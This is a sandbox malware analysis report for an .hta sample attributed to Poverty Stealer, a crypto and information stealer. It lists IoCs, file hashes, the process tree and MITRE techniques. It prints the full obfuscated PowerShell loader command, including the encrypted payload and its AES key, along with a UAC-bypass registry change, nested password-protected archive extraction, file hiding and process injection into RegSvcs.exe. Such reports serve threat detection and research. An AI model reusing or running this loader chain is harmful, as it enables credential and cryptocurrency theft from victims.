Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-03-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
Resource
win10v2004-20240226-en
General
-
Target
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
-
Size
72KB
-
MD5
e09e50f4c8308806ae21242538e17e88
-
SHA1
3d5d0f3e384ec93f87716cc49487cd7ef1e8714a
-
SHA256
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
-
SHA512
a5557c34562a8f2cf1ba07029f07d389788579c4333e0856da1b6b7ba09484015dbfcf8f6f43d3e21787e8ef70b82062d29ebbfaf57fc50ed6d2015b272c7259
-
SSDEEP
768:fEnAiXp/x27ioVgCtTLalOmilXO3SuDbvq572+/unhi1zOz:Mn/p/x27ioVgCtTLbmweSuPyKti5Oz
Malware Config
Signatures
-
Detect Poverty Stealer Payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4856-154-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/4856-161-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/4856-162-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/4856-163-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/4856-164-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral2/memory/4856-166-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 41 3120 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exePhotoshop.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation Photoshop.exe -
Executes dropped EXE 8 IoCs
Processes:
Photoshop.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exenmYIeCI7gcMH.exepid process 2040 Photoshop.exe 996 7z.exe 3480 7z.exe 4056 7z.exe 4416 7z.exe 2368 7z.exe 4084 7z.exe 2336 nmYIeCI7gcMH.exe -
Loads dropped DLL 6 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 996 7z.exe 3480 7z.exe 4056 7z.exe 4416 7z.exe 2368 7z.exe 4084 7z.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
nmYIeCI7gcMH.exedescription pid process target process PID 2336 set thread context of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4656 powershell.exe 4656 powershell.exe 3120 powershell.exe 3120 powershell.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
powershell.exepowershell.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedescription pid process Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeRestorePrivilege 996 7z.exe Token: 35 996 7z.exe Token: SeSecurityPrivilege 996 7z.exe Token: SeSecurityPrivilege 996 7z.exe Token: SeRestorePrivilege 3480 7z.exe Token: 35 3480 7z.exe Token: SeSecurityPrivilege 3480 7z.exe Token: SeSecurityPrivilege 3480 7z.exe Token: SeRestorePrivilege 4056 7z.exe Token: 35 4056 7z.exe Token: SeSecurityPrivilege 4056 7z.exe Token: SeSecurityPrivilege 4056 7z.exe Token: SeRestorePrivilege 4416 7z.exe Token: 35 4416 7z.exe Token: SeSecurityPrivilege 4416 7z.exe Token: SeSecurityPrivilege 4416 7z.exe Token: SeRestorePrivilege 2368 7z.exe Token: 35 2368 7z.exe Token: SeSecurityPrivilege 2368 7z.exe Token: SeSecurityPrivilege 2368 7z.exe Token: SeRestorePrivilege 4084 7z.exe Token: 35 4084 7z.exe Token: SeSecurityPrivilege 4084 7z.exe Token: SeSecurityPrivilege 4084 7z.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
mshta.exepowershell.exepowershell.exePhotoshop.execmd.exenmYIeCI7gcMH.exedescription pid process target process PID 1880 wrote to memory of 4656 1880 mshta.exe powershell.exe PID 1880 wrote to memory of 4656 1880 mshta.exe powershell.exe PID 1880 wrote to memory of 4656 1880 mshta.exe powershell.exe PID 4656 wrote to memory of 3120 4656 powershell.exe powershell.exe PID 4656 wrote to memory of 3120 4656 powershell.exe powershell.exe PID 4656 wrote to memory of 3120 4656 powershell.exe powershell.exe PID 3120 wrote to memory of 2040 3120 powershell.exe Photoshop.exe PID 3120 wrote to memory of 2040 3120 powershell.exe Photoshop.exe PID 3120 wrote to memory of 2040 3120 powershell.exe Photoshop.exe PID 2040 wrote to memory of 2656 2040 Photoshop.exe cmd.exe PID 2040 wrote to memory of 2656 2040 Photoshop.exe cmd.exe PID 2656 wrote to memory of 4188 2656 cmd.exe mode.com PID 2656 wrote to memory of 4188 2656 cmd.exe mode.com PID 2656 wrote to memory of 996 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 996 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 3480 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 3480 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4056 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4056 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4416 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4416 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 2368 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 2368 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4084 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 4084 2656 cmd.exe 7z.exe PID 2656 wrote to memory of 2072 2656 cmd.exe attrib.exe PID 2656 wrote to memory of 2072 2656 cmd.exe attrib.exe PID 2656 wrote to memory of 2336 2656 cmd.exe nmYIeCI7gcMH.exe PID 2656 wrote to memory of 2336 2656 cmd.exe nmYIeCI7gcMH.exe PID 2656 wrote to memory of 2336 2656 cmd.exe nmYIeCI7gcMH.exe PID 2336 wrote to memory of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe PID 2336 wrote to memory of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe PID 2336 wrote to memory of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe PID 2336 wrote to memory of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe PID 2336 wrote to memory of 4856 2336 nmYIeCI7gcMH.exe RegSvcs.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Users\Admin\AppData\Roaming\Photoshop.exe"C:\Users\Admin\AppData\Roaming\Photoshop.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"5⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\mode.commode 65,106⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p125762329330388294023250819845 -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:996 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3480 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4084 -
C:\Windows\system32\attrib.exeattrib +H "nmYIeCI7gcMH.exe"6⤵
- Views/modifies file attributes
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe"nmYIeCI7gcMH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:4856
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51a9f0871e2603addb86af5e7eb66f1d4
SHA1fe3ff665c4f6de7b189edcf95f7dc0b65a2f21ca
SHA256246c0061674e59b29627989240600f398843059a01ae86291a21b5a798378a7f
SHA512eddda8a5160190c2388c565b91cd9fa002e174a67810ea8a9414e6a8f72829787ff5eeaaf1026f6a4a255156ad6e755f815a16db2de61ba8e59efe0aa66cafae
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
2.2MB
MD547e8ed572da00474326b4cee8f85b005
SHA194bceabdc880c41d73d6c984a9d61c31dd29ce91
SHA256abd52eb132c8c23669233a656f036a0e07692efd398894b724b61b66a75564af
SHA51231da04b57f0ef1b3363a3fa4855ca576d9159d374de0d2d9defb5524e67fed740441dcc2245a246daecab6260a419c02a32770ee9be53a2ddbede9dd4848d624
-
Filesize
509KB
MD55f79b89dbaf23387caa818b0da7b8ea2
SHA13c38d94819331fd551c07048841cfe6ecbf29e18
SHA2567abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
SHA512a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc
-
Filesize
509KB
MD5763cb011f068f184a672e254d3ce3c39
SHA159eb148e6ad321cac5396e6a58c1528f7932befb
SHA256d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28
-
Filesize
509KB
MD5210ee7f34c0ff268d33d598a49eb889a
SHA1876dea438f3f365513159630a12a2192fecd8b7f
SHA2569d8ee7edf36676633d624774cb194a45ef8ae286cb5e9591d46c20be57a9282f
SHA512383bb66f996b858d4ef23eed2264c4f890d47aca7b3da88587e3bb6454183f8d35e44411b08eecafe3fbb0638610cd872d1d00402dd8ff0b660102a44b53bcb1
-
Filesize
509KB
MD54ab6b1ed8f26df37c531a80147982511
SHA125d59710197c30eee836096dfcce139ba84f978a
SHA25633f73488015443cc05fa02d1c0723921502de5cac3206cf9fc433472a2afb162
SHA512a582e4cd93baf45b48aad086ffc5edab4ec899cbd029e9e740e93cf34a2aff492f14c92ed2efc0339fc4eed979311600007fca3075abda28232d9d351dd49e24
-
Filesize
2.1MB
MD59e57c6bb6dfb456cd9907844b7afafbd
SHA1daee76439ed4cd77192dc5c2d52b187f18e5ba99
SHA256729dbb0bd855dc1c1cf59366f49e29cb2b6e0d1279270924d2b131d7df749eab
SHA5123a99dae0a7c4ac47c5143dd6ada9a485cf115d3d9b172c3ba6d0847d6848e41defccd3a4eaf1b44c3ae46820c2164127b4e1ceaa5e07a8028e9b38f823a5960b
-
Filesize
2.1MB
MD5afaebf70e6daf7bf2e07cd11f93ee4a1
SHA14e8b08b3e50f860955bd00d16fc1653c07b7c608
SHA2564a9d76fb9d77efaf81616e750b928ba3955599acafb2c0fec0d7ce412db0f47b
SHA5124db3a63f03f8816b85fdb905e2a2f08967f9f3735206f08f2cae8b8cd561e8563d2f92c188d32b94fdb6d472e07c5f41f54e26673f8a81449454225220ba397f
-
Filesize
491B
MD512b875e85a885c81bc04161e9df9151a
SHA17d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA25697e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA5123ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca
-
Filesize
619KB
MD553c6cf5bf9ce4922b3dc9bf9cc2374a2
SHA1b9a0d229a47fadaaa0898d32dce3aac279ac8569
SHA2562bb1a0a95249e3bcca1fdfc740bc91df10dc9c8cd834707a0b5a31883eb6867e
SHA512d323cfdfc3db5c5ce70ba572c0c657def11c3b36703a029977f5c5ddfdb278dfd1eea8950686d7a566dcd550aa0c854ceb035e6e67fcb377a8fc50dc4e0cd64c
-
Filesize
3.0MB
MD5a8048bd6fc7d336d7f6e0fd6800da673
SHA1f28db14f2884ac1db0ce53a7ec7bee572541d902
SHA256d7414d6e34052bd4194ebf979a405af4e0d39b42b6d4d6ad31db85fd78dcc31d
SHA512570d1ac52dcb8f6c67983a4af99fece9f47e03beba83b9b2c95ce544f5b5f40c8c7e46019f5e106b258de2affee91988053dbab9e777e1c115d3803513eea066
-
Filesize
1.4MB
MD54fd52f2655010a63deae8d3d492f6bda
SHA199b1ccc13b1561e93784d860d03329cfd746f6e5
SHA256d4a0f3946c6a6204230f05b41b5c403f1c4678afb3968a1916e45a5d5f277443
SHA51285f205ed13bb8dead4df2eb9ce8603142d9ffc0d6758f79fbbd26172a95e466072e2298848647da1ca478328632108624b766f235b3f9d5c90274e72e22d0344